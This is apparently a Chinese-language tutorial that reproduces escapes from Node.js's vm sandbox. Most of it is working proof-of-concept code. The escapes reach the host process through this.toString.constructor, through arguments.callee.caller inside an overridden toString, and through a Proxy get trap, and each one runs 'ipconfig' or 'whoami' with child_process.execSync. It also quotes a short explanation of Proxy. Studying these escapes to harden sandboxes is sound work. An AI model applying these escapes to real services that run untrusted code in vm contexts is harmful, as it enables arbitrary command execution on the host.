沙箱逃逸复现

沙箱逃逸

0x01

const vm = require('vm'); //隔离环境
const script = `const process = this.toString.constructor('return process')() 
process.mainModule.require('child_process').execSync('ipconfig').toString()`;
const sandbox = { m: 1, n:2  };
const context = new vm.createContext(sandbox); //沙箱上下文环境
const res = vm.runInContext(script, context);
console.log(res)

沙箱的本质是内部环境能访问到外部变量，这里的this就是沙箱外的对象。

const process = this.toString.constructor('return process')() 
process.mainModule.require('child_process').execSync('ipconfig').toString()

通过this来引入上下文没有的模块，this.toString.constructor指向Function函数，获取process模块，用来获得node进程相关的信息，比如运行node程序时的命令行参数。

成功执行代码

只要能在沙箱内部，找到一个沙箱外部的对象，借助这个对象内的属性即可获得沙箱外的函数，进而绕过沙箱。

0x02

const vm = require('vm'); 

const script = `(() => {  

const a = {}  

a.toString = function () {    

const cc = arguments.callee.caller;    //拿到调用函数的方法，指向toString

const p = (cc.constructor('return process'))();   //cc.constructor 也就是Function

 return p.mainModule.require('child_process').execSync('whoami').toString()  

}  

return a })()`; 

const sandbox = Object.create(null); 

const context = new vm.createContext(sandbox); 

const res = vm.runInContext(script, context); 

console.log('Hello ' + res) 

Object.create(null) 是一个创建一个新对象的方法，该对象没有继承自任何原型链，所以this的值为null，如果在sandbox的上下文环境中用this来访问外部变量，将会是null

所以用到了arguments，通过‘arguments.callee.caller’获取函数调用者，也就是toString

console.log('Hello ’ + res) res和字符串连接会直接调用toString，触发a.toString = function ()这个方法

成功执行代码

如果外部代码没有拼接字符串：console.log( res) ，就需要利用proxy劫持外部的get

Proxy 可以理解成，在目标对象之前架设一层“拦截”，外界对该对象的访问，都必须先通过这层拦截，因此提供了一种机制，可以对外界的访问进行过滤和改写。Proxy 这个词的原意是代理，用在这里表示由它来“代理”某些操作，可以译为“代理器”。

var proxy = new Proxy({}, {
  get: function(target, propKey) {
    return 35;
  }
});
proxy.time // 35
proxy.name // 35
proxy.title // 35

上面代码中，作为构造函数，Proxy接受两个参数。第一个参数是所要代理的目标对象（上例是一个空对象），即如果没有Proxy的介入，操作原来要访问的就是这个对象；第二个参数是一个配置对象，对于每一个被代理的操作，需要提供一个对应的处理函数，该函数将拦截对应的操作。比如，上面代码中，配置对象有一个get方法，用来拦截对目标对象属性的访问请求。get方法的两个参数分别是目标对象和所要访问的属性。可以看到，由于拦截函数总是返回35，所以访问任何属性都得到35。
——出自: https://www.bookstack.cn/read/es6-3rd/spilt.1.docs-proxy.md

const vm = require('vm'); 

const script = `(() => {  

    const a = new Proxy({}, { 
    
    get: function() {      
    
    const cc = arguments.callee.caller;      
    
    const p = (cc.constructor.constructor('return process'))();     
    
     return p.mainModule.require('child_process').execSync('whoami').toString()
    
    }  
    
    })    
    
    return a })()`; 

const sandbox = Object.create(null); 

const context = new vm.createContext(sandbox); 

const res = vm.runInContext(script, context); 

console.log(res.xxx) 

通过使用proxy，劫持get方法执行下列代码

const a = new Proxy({}, { 
 
 get: function() {      
  
  const cc = arguments.callee.caller;      
 
  const p = (cc.constructor.constructor('return process'))();     
 
 return p.mainModule.require('child_process').execSync('whoami').toString()

成功执行代码